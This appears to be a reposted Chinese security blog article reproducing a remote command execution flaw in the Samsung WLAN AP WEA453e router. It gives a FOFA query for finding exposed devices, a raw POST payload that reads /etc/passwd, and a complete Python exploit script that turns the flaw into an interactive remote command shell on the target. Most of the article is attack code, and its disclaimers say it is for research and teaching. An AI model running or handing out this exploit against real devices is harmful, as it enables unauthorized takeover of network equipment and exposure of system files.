fofa语句:
title=="Samsung WLAN AP"
我们随便点一个进去
接着我们使用POC
POST /(download)/tmp/a.txt HTTP/1.1Host: xxx.xxx.xxx.xxxConnection: closeContent-Length: 48command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
读取一下当前目录文件
具体详细可看原作者推文:
(加):
peiqi师傅的脚本:
import requestsimport sysimport randomimport reimport base64import timefrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ �33[34mPOC_Des: http://wiki.peiqi.tech �33[0m')print('+ �33[34mGithub : https://github.com/PeiQi0 �33[0m')print('+ �33[34m公众号 : PeiQi文库 �33[0m')print('+ �33[34mVersion: 三星 WLAN AP WEA453e路由器 �33[0m')print('+ �33[36m使用格式: python3 poc.py �33[0m')print('+ �33[36mUrl >>> http://xxx.xxx.xxx.xxx �33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "/(download)/tmp/a.txt"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}data = "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt"try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)if "root" in response.text and response.status_code == 200:print("�33[36m[o] 目标 {} 存在漏洞, 响应为:n{}�33[0m".format(target_url, response.text))while True:cmd = str(input("�33[35mCmd >>> �33[0m"))POC_2(target_url, cmd)else:print("�33[31m[x] 目标 {} 不存在默认管理员弱口令 �33[0m".format(target_url))except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)def POC_2(target_url, cmd):vuln_url = target_url + "/(download)/tmp/a.txt"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}data = "command1=shell:{}| dd of=/tmp/a.txt".format(cmd)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)print("�33[36m{} �33[0m".format(response.text))except Exception as e:print("�33[31m[x] 请求失败 �33[0m", e)if __name__ == '__main__':title()target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))POC_1(target_url)
参考(加):
http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E4%B8%89%E6%98%9F/%E4%B8%89%E6%98%9F%20WLAN%20AP%20WEA453e%E8%B7%AF%E7%94%B1%E5%99%A8%20%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html?h=%E4%B8%89%E6%98%9F%20WLAN%20AP%20WEA453e%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
本文始发于微信公众号(thelostworld):三星 WLAN AP WEA453e路由器 远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论